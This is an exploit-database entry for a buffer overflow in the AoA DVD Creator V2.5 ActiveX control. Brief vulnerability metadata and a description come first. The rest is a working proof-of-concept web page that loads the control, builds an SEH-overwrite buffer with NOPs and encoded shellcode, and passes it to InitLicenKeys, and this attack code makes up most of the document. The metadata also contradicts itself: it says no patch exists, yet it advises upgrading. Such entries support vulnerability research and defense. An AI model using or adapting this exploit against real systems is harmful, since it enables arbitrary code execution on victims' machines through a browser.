AoA DVD Creator V2.5 Activex

vendor:

AoA DVD Creator

by:

Carlos Mario Penagos Hollmann

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: AoA DVD Creator

Affected Version From: V2.5

Affected Version To: V2.5

Patch Exists: NO

Related CWE: N/A

CPE: a:aoamedia:aoa_dvd_creator

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2011

AoA DVD Creator V2.5 Activex

A buffer overflow vulnerability exists in AoA DVD Creator V2.5 Activex due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable application. This can result in arbitrary code execution in the context of the application.

Mitigation:

Upgrade to the latest version of AoA DVD Creator V2.5 Activex.

Source

Exploit-DB raw data:

# Exploit Title: AoA DVD Creator V2.5 Activex
# Date: Febrary 07  2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://www.aoamedia.com/aoadvdcreator.exe
# Version: v2.5
# Tested on: Windows xp sp3  running on VMware Fusion 3.1 and VirtualBox 3.2.8


<html>
  mail----> shogilord^gmail.com spams are welcome!!!!!
    ________  _    _________   ____ __ _____   ________
   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __
 / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ /
/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/
   
 COLOMBIA hacking presents.............

AoA DVD Creator exploit IE 6 ,IE 7 , IE 8
NO Heap Spray some badchars :(
the vendor dint replay my emails so here is the exploit

<object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target'></object>
<script language='javascript'>
alert("done");

nseh="\xEB\x06\x90\x90";
seh="\xB3\xF1\x07\x10";
nops="\x90\x90\x90\x90\x90\x90\x90";
shell= "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4b\x58\x4e\x4e\x45\x45\x4b\x48\x4e\x4e\x4a\x56\x42\x52\x42\x32\x42\x32\x4f\x52\x4a\x36\x43\x56\x41\x36\x4e\x36\x43\x56\x4d\x38\x45\x44\x4a\x4f\x42\x35\x4a\x4b\x47\x4c\x43\x39\x44\x4c\x47\x37\x4f\x4f\x42\x4d\x5a";
junk1="A";
junk2="B";
while (junk1.length<2032){ junk1+=junk1;}

junk1=junk1.substring(0,2032);
junk2=junk1;
arg1="defaultV";
arg2="defaultV";
arg3=junk1+nseh+seh+nops+shell+junk2;
arg4="defaultV";
arg5="defaultV";

target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );
alert("done");

</script>